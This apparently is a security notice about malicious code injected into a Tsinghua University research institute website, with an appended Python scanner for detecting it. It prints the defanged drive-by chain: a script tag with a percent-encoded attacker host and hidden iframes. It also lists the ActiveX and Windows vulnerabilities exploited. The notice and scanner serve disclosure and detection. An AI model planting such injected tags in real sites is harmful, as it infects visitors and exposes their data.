Tsinghua University Real Estate Research Institute website implanted with a trojan by hackers

The website of the Real Estate Research Institute of Tsinghua University (hxxp://s.ires.tsinghua.edu.cn/) has been implanted with malicious code by hackers. When a user visits the page, the system automatically downloads and runs malicious programs from a malicious website. An infected system may be remotely controlled and the user's sensitive information stolen. It may even crash.

Code found on the site:



< script language=javascript src=hxxp://%71%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js> < /script>

Frame code in hxxp://q.94saomm.com/js.js:



< iframe src=hxxp://tqyb.960960.net/yu/rs.htm width=100 height=0>< /iframe>

Frame code in hxxp://tqyb.960960.net/yu/rs.htm:



< iframe src=x.htm width=100 height=1>< /iframe>

After decrypting the frame code in hxxp://tqyb.960960.net/yu/x.htm, it was found that the malicious web page spreads through the following vulnerabilities:

RealPlayer IERPCtl.IERPCtl.1 vulnerability

RealNetworks RealPlayer ActiveX rmoc3260.dll memory corruption vulnerability

MS06-014 vulnerability

ourgame.com GLIEDown2.dll ActiveX control multiple buffer overflows

Sina DLoader Class ActiveX control arbitrary file download vulnerability

MS08-041 vulnerability

Storm Video 2009 (mps.dll) ActiveX remote stack overflow
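
The injection chain above has two recognizable traits: a script tag whose hostname is percent-encoded, and iframes with a height of 0 or 1. The following is an added example, not part of the original post, that a site operator could run over their own pages to flag both. The class and function names and the sample page are constructed for illustration, and the sample's tags are written without the space after "<" so that they parse.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

class InjectionScanner(HTMLParser):
    """Flags script/iframe tags that match the injection pattern in this post."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("script", "iframe"):
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = urlsplit(src).netloc
        # Percent-encoding a hostname hides it from a plain-text search for
        # the domain; report the decoded form.
        if "%" in host:
            self.findings.append(("encoded-host", tag, unquote(host)))
        # An iframe sized 0 or 1 in either dimension is invisible to the visitor.
        if tag == "iframe":
            for dim in ("width", "height"):
                m = re.match(r"\s*(\d+)", a.get(dim) or "")
                if m and int(m.group(1)) <= 1:
                    self.findings.append(("hidden-iframe", dim, src))
                    break

def scan(html):
    """Return a list of (kind, detail, value) findings for one HTML document."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample page built from the defanged snippets quoted in the post,
# plus one ordinary same-site script that must not be flagged.
SAMPLE = """<html><body><p>Institute news</p>
<script language=javascript src=hxxp://%71%2E%39%34%73%61%6F%6D%6D%2E%63%6F%6D/js.js></script>
<iframe src=hxxp://tqyb.960960.net/yu/rs.htm width=100 height=0></iframe>
<iframe src=x.htm width=100 height=1></iframe>
<script src="/static/site.js"></script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The decoded hostname in the first finding matches the hxxp://q.94saomm.com/js.js address the post names for the second stage.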
